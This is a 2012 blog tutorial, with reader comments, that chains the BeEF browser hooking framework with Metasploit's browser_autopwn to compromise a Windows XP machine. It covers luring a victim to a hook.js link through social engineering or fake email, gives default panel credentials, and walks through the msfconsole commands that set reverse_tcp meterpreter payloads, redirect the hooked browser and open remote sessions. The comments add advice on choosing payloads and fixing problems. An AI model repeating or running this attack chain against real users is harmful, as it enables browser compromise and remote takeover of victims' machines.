Monday, February 27, 2012

Exploit Combo ~ BeeF & Metasploit

Exploitation is so much fun and exciting for me..  :D
In this post I'll try to combine BeeF and Metasploit to create an Attack. BeeF, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my XP SP3 Machine.

Lets get started..  >:)

- First, start your BeeF-ng services..

- Open its control panel on our backtrack. The address is http://localhost:3000/ui/panel
- Authenticate ourself, default user:beef and password:beef
- Logged in.

- Ok, next is send a link contain the hook.js file to the victim. Lets say, using social engineering or the other technique like fake email or spoofing, I was able to make my victim visit the malicious link. I will just use the demo site provided by BeeF.

- After the victim visit the link, it will appear on the "hooked browsers" section on the BeeF control panel.

- Ok, good. Now start up metasploit console.
# msfconsole

- We will use the auxiliary/server/browser_autopwn to attack our victim. Setup the msfconsole as follows.
msf > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > set LHOST
msf  auxiliary(browser_autopwn) > set PAYLOAD_WIN32 windows/meterpreter/reverse_tcp
PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
msf  auxiliary(browser_autopwn) > set PAYLOAD_JAVA java/meterpreter/reverse_tcp
PAYLOAD_JAVA => java/meterpreter/reverse_tcp

- Type 'exploit' to start the browser_autopwn server. Wait until it finished loading all exploit.

- Notice the Url.

- We must redirect the browsers victim to our address where the metasploit browser_autopwn is waiting. In my case will be
- Back to the BeeF control panel, go to commands>browser>site redirect

- Point to our address.

- Execute..

- And wait what will happen at the metasploit console

- A meterpreter sessions is oppened..  :D
- To see the list of opened sessions type "sessions -l"

- To connect/interact with that sessions type "sessions -i 1"

- Owned..  >:D
Combo exploitation successfull.. 
Still have to train my attack vector though, this is not enough..  :)

"the quieter you become, the more you are able to hear.."


Anonymous said...

I see there are two payload, java and win32. What must always be so?
how the logic of the performance of both the payload?
just ask ^ _ ^
newbie advised

Anonymous said...

@anonymous : 1st things to say, please use a proper sentences, you have problem with your English. I'm quite confuse with your question and I bet the writer too.

dragon-master said...

@anonymous 2 > lol, you read my mind.. :D
no problem, just translate it back with google translate.. :P

@anonymous 1 > as you can see above, i use the browser_autopwn, it is an auxliary that can detect the vulnerability of the system that connects to it. so, actually there are more than 2 payload available for us to customize.
After the auxiliary detect the vulnerable point, it will launch an exploit on that point. I set only win32 and java payload because i know that the target is a microsoft windows system. If you want to use custom payload in the other system like linux, or mac you also can set it.
FYI, default payload that will be used on the exploit will be a shell_reverse_tcp (if i'm not mistaken.. :P )
And the last, all payload running on the different port, so it won't conflict to each other.

anyway, thanks for coming.. :)

Rui Fujiwara said...

I learn more about Beef after I read your Blog... You can see my Blog is Weird in Beef article (~_~) hehehe....

dragon-master said...

> Rui-senpai : hehe..
i think your method isn't wrong too..
everyone have its own attack vector right.. :D

Atomix Gray said...

This is great!!! Thanks for this post

dragon_master said...

glad you like it..

anyway, thanks for coming to my blog.. :D

Unknown said...

Metasploit network security software,Thanks for sharing such an informative article.

Download Metasploit network security software

shivamXP said...


Anonymous said...


Whenever the hooked browser is redirected to the local url, autopwn just gets stuck on "responding with 6 exploits." Do you have any idea on whats gone wrong? I followed the tutorial perfectly.

security technology  said...

You know your projects stand out of the herd. There is something special about them. It seems to me all of them are really brilliant!

Post a Comment